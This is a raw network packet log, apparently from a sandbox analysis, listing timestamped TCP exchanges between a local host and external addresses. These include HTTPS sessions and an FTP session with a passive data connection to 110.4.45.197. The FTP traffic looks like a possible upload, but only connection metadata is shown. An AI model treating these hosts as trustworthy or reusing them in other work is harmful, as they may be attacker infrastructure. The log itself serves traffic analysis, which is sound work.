                                                                                            Oct 30, 2024 08:34:59.639663935 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.639738083 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.667295933 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.667377949 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.753343105 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.753424883 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.753814936 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.753887892 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.754165888 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.754225969 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.755024910 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.755110025 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.755127907 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.755197048 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.756084919 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.756160021 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.756172895 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.756181002 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.756217957 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.756225109 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.756930113 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.757000923 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.757842064 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.757901907 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.757919073 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.757965088 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.757982016 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.758747101 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.758810997 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.758822918 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.758893013 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.759704113 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.759830952 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.786201954 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.786273956 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.872139931 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.872194052 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.872282982 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.872298956 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.872311115 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.872343063 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.872490883 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.872560024 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.872571945 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.872637987 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.872742891 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.872807980 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.872896910 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.872958899 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.873037100 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.873102903 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.877638102 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.877708912 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.877887964 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.877948046 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.878040075 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.878171921 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.878171921 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.878173113 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.878180981 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.878247976 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.878319025 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.878326893 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.878431082 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.878492117 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.878500938 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.878571987 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.878632069 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.878638983 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.878767967 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.878824949 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.878834963 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.878988981 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.879041910 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.879053116 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.879060030 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.879096031 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.879106045 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.879199982 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.879266977 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.879290104 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.879362106 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.879369020 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.879427910 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.880003929 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.880062103 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.880067110 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.880073071 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.880111933 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.880120993 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.880177975 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.880186081 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.880240917 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.880328894 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.880384922 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.880770922 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.880832911 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.905061007 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.905215979 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.905236959 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.905245066 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.905277014 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.905297041 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.905376911 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.905438900 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.991076946 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.991219997 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.991238117 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.991245985 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.991280079 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.991317034 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.991389990 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.991466999 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.991895914 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.991985083 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.991996050 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.992070913 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.992104053 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.992177963 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.992484093 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.992566109 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.992621899 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.992691040 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.992753029 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.992834091 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.992923975 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.992991924 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.993124008 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.993200064 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.993449926 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.993520975 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.993622065 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.993696928 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.993915081 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.993982077 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.994128942 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.994201899 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.994256020 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.994324923 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.994431973 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.994509935 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.994662046 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.994733095 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.994990110 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.995058060 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.995168924 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.995255947 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.995470047 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.995537996 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.995665073 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.995738029 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.995862961 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.995939016 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.996023893 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.996109009 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.996227026 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.996305943 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.996407032 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.996478081 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.996566057 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.996644974 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.996678114 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.996745110 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.996846914 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.996917009 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.997011900 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.997100115 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.997162104 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.997234106 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.997339964 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.997417927 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.997468948 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.997540951 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.997612000 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.997689962 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.997740030 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.997811079 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.024378061 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.024487972 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.024525881 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.024652958 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.024704933 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.024713039 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.024722099 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.024756908 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.110094070 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.110204935 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.110358000 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.110510111 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.110764980 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.110824108 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.110830069 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.110856056 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.110907078 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.113399982 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.113418102 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.113428116 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.113432884 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:06.148466110 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:06.148504972 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:06.148561954 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:06.162122965 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:06.162142038 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:06.774816990 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:06.774882078 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:06.780165911 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:06.780178070 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:06.780455112 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:06.843198061 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:06.887340069 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:07.017381907 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:07.017477989 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:07.017785072 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:07.023035049 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:08.532341957 CET4973321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:08.537884951 CET2149733110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:08.540617943 CET4973321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:08.543725014 CET4973321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:08.549216986 CET2149733110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:08.549719095 CET4973321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:08.638937950 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:08.646059990 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:08.646141052 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:09.569416046 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:09.569741011 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:09.575126886 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:09.908655882 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:09.908821106 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:09.914218903 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:10.273730040 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:10.273893118 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:10.279398918 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:10.612694979 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:10.612874985 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:10.618274927 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:10.951411963 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:10.951900005 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:10.958168030 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.290183067 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.290445089 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:11.295870066 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.628808975 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.629463911 CET4973550707192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:11.634876013 CET5070749735110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.634948969 CET4973550707192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:11.635008097 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:11.640415907 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.658726931 CET49736443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.658757925 CET4434973650.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.658868074 CET49736443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.658962965 CET49736443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.658994913 CET4434973650.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.659056902 CET49736443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.677764893 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.677813053 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.677891970 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.679347038 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.679363012 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.342667103 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.342750072 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.344024897 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.344037056 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.344285011 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.387002945 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.417752981 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.459336996 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.535938025 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.539211035 CET4973550707192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:12.539211035 CET4973550707192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:12.544931889 CET5070749735110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.544944048 CET5070749735110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.544953108 CET5070749735110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.545490980 CET5070749735110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.547611952 CET4973550707192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:12.578684092 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.578715086 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.578722954 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.578794956 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.578814030 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.593998909 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:12.611825943 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.611901045 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.611916065 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.658344030 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.694648981 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.694685936 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.694705009 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.694745064 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.694789886 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.695527077 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.695547104 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.695600033 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.695622921 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.696470976 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.696491957 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.696537971 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.728183985 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.728208065 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.728249073 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.728267908 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.810343981 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.810434103 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.811175108 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.811249018 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.811846972 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.811908960 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.812733889 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.812798977 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.813635111 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.813741922 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.844257116 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.844360113 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.844556093 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.844599009 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.844630957 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.844671965 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.844733953 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.868870974 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.885957956 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.886029005 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.911962032 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:12.918148041 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.926069975 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.926151991 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.926660061 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.926714897 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.927149057 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.927201986 CET49737443192.168.2.450.116.93.185
